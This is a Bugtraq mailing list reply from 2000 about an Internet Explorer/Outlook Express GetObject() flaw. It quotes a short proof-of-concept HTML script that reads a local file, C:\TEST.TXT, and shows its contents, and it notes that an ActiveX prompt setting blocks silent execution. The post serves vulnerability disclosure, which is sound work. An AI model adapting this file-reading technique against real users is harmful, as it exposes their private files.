Bugtraq mailing list archives
Re: IE 5.5/Outlook Express security vulnerability - GetObject() expose user's files
From: Fabrice Prémel <fabrice () KESKIYA FR>
Date: Wed, 27 Sep 2000 12:03:34 GMT
------getobject1.html-------------------------------- <SCRIPT> alert("This script reads C:\\TEST.TXT\nYou may need to create it"); a=GetObject("c:\\test.txt","htmlfile"); setTimeout("alert(a.body.innerText);",2000); </SCRIPT> -----------------------------------------------------
Just a quick note : if you have configured explorer so that it asks you before executing ActiveX, it will prompt you before executing the above script. Tested on IE5.0/Win2000. Fabrice.
Current thread:
- IE 5.5/Outlook Express security vulnerability - GetObject() expose user's files Georgi Guninski (Sep 27)
- Re: IE 5.5/Outlook Express security vulnerability - GetObject() expose user's files Fabrice Prémel (Sep 27)